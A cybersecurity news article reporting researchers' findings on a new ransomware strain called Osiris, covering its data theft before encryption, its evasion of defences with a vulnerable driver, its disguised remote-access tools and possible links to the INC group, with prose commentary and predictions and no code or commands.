Listen to this Post
Introduction
A newly identified ransomware strain known as Osiris has entered the cyber threat landscape, raising alarms among security researchers and enterprise defenders alike. Discovered during the investigation of a targeted November 2025 attack against a major Southeast Asian food service franchise operator, Osiris represents more than just another name in the long list of ransomware families. Its advanced capabilities, stealthy attack chain, and apparent links to established threat actors suggest a calculated evolution rather than an amateur operation. While the name Osiris echoes a ransomware variant from nearly a decade ago, researchers are clear that this is an entirely new threat, built with modern tactics and deployed by experienced hands.
the Original Findings
Security researchers from Symantec and VMware Carbon Black uncovered Osiris while analyzing a real-world intrusion that unfolded quietly over several days. The attackers began by exfiltrating sensitive data using Rclone, transferring stolen information to a Wasabi cloud storage bucket long before any encryption took place. This data theft-first approach aligns with modern double-extortion ransomware strategies, where victims are pressured not only by locked systems but also by the threat of data leaks.
Osiris itself is a fully featured ransomware payload. It can terminate services and processes, selectively encrypt files and folders, and deploy a ransom note to guide victims into negotiations. The malware supports a wide range of command-line options, allowing operators to fine-tune encryption behavior, logging, target selection, and even how virtualized environments like Hyper-V are handled. Encrypted files receive a distinctive .Osiris extension, while system-critical directories and specific file types are deliberately skipped to keep the operating system functional.
From a technical standpoint, Osiris employs a hybrid encryption scheme combining elliptic curve cryptography with AES-128 in CTR mode, generating a unique encryption key for each file. It uses asynchronous I/O managed through completion ports, an efficiency-focused design choice more often seen in mature malware families. To further damage recovery efforts, the ransomware deletes Volume Shadow Copy Service snapshots and forcibly terminates database, backup, and productivity-related processes.
The intrusion relied heavily on tool reuse. Attackers deployed a known Mimikatz variant, kaz.exe, along with dual-use utilities such as Netscan, Netexec, and MeshAgent for network discovery and lateral movement. A customized version of the RustDesk remote monitoring tool was also used, deliberately disguised with WinZip branding and icons to evade suspicion during forensic reviews.
To neutralize endpoint defenses, the attackers used a malicious driver called POORTRY, also known as Abyssworker, leveraging a bring-your-own-vulnerable-driver technique. Masquerading as a legitimate Malwarebytes component, the driver was used to disable security software at the kernel level. Additional tools like KillAV were deployed for the same purpose. Once defenses were weakened, Remote Desktop Protocol access was enabled, ensuring persistent control before the ransomware was finally executed.
Although little is known about Osiris’s developers or whether it operates under a ransomware-as-a-service model, researchers identified tactical overlaps with the INC (also known as Warble) ransomware group. These similarities point either to imitation or to the involvement of a former INC affiliate. Despite these clues, definitive attribution remains elusive.
What Undercode Say:
Osiris is not dangerous because it is new, it is dangerous because it is familiar in all the wrong ways. The attack chain reads like a greatest-hits compilation of modern ransomware operations, refined rather than reinvented. Data exfiltration days before encryption, heavy reliance on dual-use tools, kernel-level defense evasion, and carefully engineered encryption logic all point to operators who understand both enterprise environments and incident response playbooks.
The use of BYOVD via the POORTRY driver is especially telling. This technique has become a hallmark of skilled ransomware crews who know that bypassing endpoint protection is often more effective than attempting to evade it at user level. Kernel drivers grant power, and power shortens dwell time. Once defenses are blind, everything else becomes easier.
Another red flag is the customization of legitimate remote management software. Disguising RustDesk as “WinZip Remote Desktop” is not just a cosmetic trick, it reflects an understanding of how defenders triage alerts and review binaries under pressure. Blending in is often more valuable than exploiting zero-days, and Osiris operators appear to know that well.
The possible link to INC ransomware actors matters, even if attribution is not confirmed. INC has historically favored disciplined operations over noisy mass campaigns. If Osiris is indeed connected to former INC affiliates, it suggests a splintering trend where experienced actors spin up new brands to escape law enforcement heat or reputational baggage while retaining proven tooling and tactics.
Equally important is what remains unknown. There is no clear evidence yet of a public ransomware-as-a-service offering, no known leak site, and no chatter suggesting large-scale distribution. This points to either a private ransomware framework or a group still in its early operational phase. Both scenarios carry risk. Private frameworks often target fewer victims but hit them harder, while early-stage families tend to evolve rapidly once initial attacks succeed.
Osiris should be read as a signal, not an outlier. It reflects a ransomware ecosystem where innovation happens quietly, attribution grows murkier, and recycled tools are sharpened rather than discarded. Defenders who rely solely on signature-based detection or assume new names mean new capabilities will continue to be caught off guard.
Fact Checker Results
✅ Osiris is a newly identified ransomware strain unrelated to the 2016 Locky-based variant.
✅ The attack used BYOVD techniques and data exfiltration prior to encryption.
❌ Direct attribution to the INC ransomware group has not been conclusively proven.
Prediction
📊 Osiris is likely to evolve into a more visible threat if its initial operations remain successful.
📊 Future campaigns may reveal a dedicated leak site or a formal ransomware-as-a-service model.
📊 Increased reuse of BYOVD and disguised remote tools will push defenders toward stronger driver-level and behavior-based protections.
▶️ Related Video (86% Match):
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: securityaffairs.com
Extra Source Hub (Possible Sources for article):
https://www.instagram.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
